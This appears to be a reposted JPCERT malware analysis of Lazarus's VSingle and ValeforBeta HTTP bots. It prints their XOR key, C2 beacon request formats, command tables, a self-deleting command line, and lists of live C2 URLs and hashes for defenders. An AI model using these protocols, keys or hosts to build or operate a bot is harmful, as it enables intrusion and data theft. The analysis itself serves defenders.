The attack group Lazarus (also known as Hidden Cobra) conducts various attack operations. This article introduces malware (VSingle and ValeforBeta) and tools used in attacks against Japanese organisations.
VSingle overview
VSingle is a HTTP bot which executes arbitrary code from a remote network. It also downloads and executes plugins.
Once launched, this malware runs Explorer and executes its main code
through DLL injection. (Some samples do not perform DLL injection.) The
main code contains the following PDB path:
G:\Valefor\Valefor_Single\Release\VSingle.pdb
The next sections describe VSingle's obfuscation technique and communication format.
VSingle obfuscation technique
Most of the strings in VSingle are obfuscated. Figure 1 shows the code to disable obfuscation. A fixed key value (o2pq0qy4ymcrbe4s) decodes the strings by XOR.
Below is some parts of decoded strings:
[+] Download Parameter Error [+] Download Result [+] Upload Result [+] Upload Parameter Error [+] Interval Interval was set to [+] Plugin Download Result [+] Update [+] Info [+] Uninstall Valefor was uninstalled successfully. [+] Executable Download Result [+] Executable Download Parameter Error ufw=%s&uis=%u cmd.exe /c %s [%02d-%02d-%04d %02d:%02d:%02d] [+] Plugin Execute Result
VSingle communication with C2 servers
Below is the HTTP GET request that VSingle sends to its C2 server at the beginning of the communication.
GET /polo/[Unix time]/[random string].php?ufw=[Base64 data]&uis=[unique ID] HTTP/1.1 Host: maturicafe.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729) Accept: text/html3,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
[Base64 data] contains the Base64-encoded value of "[IP
address]|[Windows version number]|[version]". As a response to this
request, AES-encrypted data including commands is downloaded from the
server. The encryption key is specified in Set-Cookie header in the
response.
VSingle also works with authentication proxy (Basic authentication). If
the malware contains proxy settings, it can communicate in proxy
environment as follows:
GET https://maturicafe.com/polo/[Unix time]/[random string].php?ufw=[Base64 data]&uis=[unique ID] HTTP/1.1 Host: maturicafe.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729) Proxy-Connection: keep-alive Proxy-Authorization: Basic [credential] Pragma: no-cache Cache-Control: no-cache
VSingle functions
VSingle has 8 simple functions as listed below:
Command number | Contents |
1 | Upload file |
2 | Set communication interval |
3 | Execute arbitrary command |
4 | Download/execute plugin |
5 | Update |
6 | Send malware information |
7 | Uninstall |
8 | Download file |
It executes the following 4 types of plugins:
- Windows PE file (saved as a .tmp file)
- VBS file (saved as a .vbs file)
- BAT file (saved as a .bat file)
- Shellcode
Figure 2 shows a part of the code to execute a plugin.
Plugins are temporarily saved in %TEMP% folder and then executed except
for the shellcode ones; They are saved in %TEMP% folder but loaded and
executed on memory.
When the command number 6 (sending malware information) is selected, the
data in Figure 3 is sent. As for the version number, 4.1.1, 3.0.1 and
others have been confirmed in addition to 1.0.1. It is possible that
this number indicates some sort of identifier, rather than its malware
version.
ValeforBeta overview
ValeforBeta is a HTTP bot developed in Delphi, and its functions are
even simpler than those of VSingle. Besides arbitrary code execution
from remote network, it just uploads and downloads files.
The next sections describe ValeforBeta's configuration and communication format.
ValeforBeta configuration
Figure 4 shows the code to load the configuration. It contains sample ID ("512" in Figure 4), access type and intervals, as well as C2 server information.
There are 3 different access types:
- Connect directly (INTERNET_OPEN_TYPE_DIRECT)
- Use default setting (INTERNET_OPEN_TYPE_PRECONFIG)
- Connect via proxy (INTERNET_OPEN_TYPE_PROXY)
ValeforBeta communication with C2 servers
Below is the HTTP POST request that ValeforBeta sends to its C2 server at the beginning of the communication.
POST /doc/total.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Cookie: JSESSIONID=[Base64 data] User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3) Host: 3.90.97.16 Content-Length: 0 Proxy-Connection: Keep-Alive Pragma: no-cache
Although it is a HTTP POST request, it does not contain any data to send. The Base64-encoded data after "JSESSIONID=" in the Cookie header contains the information of an infected host. Below is the format of Base64-encoded data.
[8-letter random string][data][random string (4-12 letters)]
[data] contains the version information of the malware and the IP
address of the infected hosts. (See request type "0" in Appendix A for
more details.) If the response from the server is "200 OK", the next
request is sent (Request type "1").
The C2 server sends data including commands. The result of the command
execution is sent as a part of the HTTP POST request, disguised as a BMP
file. Figure 5 shows part of the code to send the command execution
result.
ValeforBeta functions
ValeforBeta has only 6 functions as listed in Table 2.
Command number | Contents |
1 | Download file |
2 | Upload file |
3 | Execute arbitrary shell command |
4 | Uninstall (Executes cmd /c ping -n 4 127.0.0.1 >NUL & echo VFB > "file name of itself") |
6 | Set Sleep Time |
7 | Send system information |
The command execution result is XOR-encoded. Figure 6 shows the decoded string of data sent with command number 7 (sending system information).
Tools used after intrusion
The attackers use the following 3 tools in this operation in order to relay communication with C2 server.
- 3Proxy
- Stunnel
- Plink
In closing
We introduced malware and tools that Lazarus used in the operation
against Japanese organisations. We will provide an update if we find new
types of malware.
The C2 servers connected to the samples described in this article are
listed in Appendix B. Please make sure that none of your devices is
communicating with them.
Shusei Tomonaga
(Translated by Yukako Uchida)
Appendix A: Data sent by ValeforBeta
Offset | Length | Contents |
0x00 | 1 | Request type (0: Send client data, 1: Request a command, 2: Send command execution result) |
0x01 | 4 | Client ID (generated from hostname, username, OS install date/time and MAC address) |
0x05 | 3 | Malware version |
0x08 | 4 | IP address |
0x0C | 3 | OS version |
- Data after 0x05 is XOR-encoded and added only for the request type "0".
Appendix B: C2 servers
- http://aquagoat.com/customer
- http://blacktiger.com/input
- http://bluedog.com/submit
- http://coraltiger.com/search
- http://goldtiger.com/find
- http://greentiger.com/submit
- http://industryarticleboard.com/evolution
- http://industryarticleboard.com/view
- http://maturicafe.com/main
- http://purplefrog.com/remove
- http://whitedragon.com/search
- https://coralcameleon.com/register
- https://industryarticleboard.com/article
- https://maturicafe.com/polo
- https://salmonrabbit.com/login
- https://whitecameleon.com/find
- https://whiterabbit.com/input
- http://toysbagonline.com/reviews
- http://purewatertokyo.com/list
- http://pinkgoat.com/input
- http://yellowlion.com/remove
- http://salmonrabbit.com/find
- http://bluecow.com/input
- http://www.karin-store.com/data/config/total_manager.php
- http://katawaku.jp/bbs/data/group/group-manager.php
- http://3.90.97.16/doc/total.php
Appendix C: Malware hash value
- 487c1bdb65634a794fa5e359c383c94945ce9f0806fcad46440e919ba0e6166e
- eb846bb491bea698b99eab80d58fd1f2530b0c1ee5588f7ea02ce0ce209ddb6
News Source @ blogs.jpcert.or.jp
No comments:
Post a Comment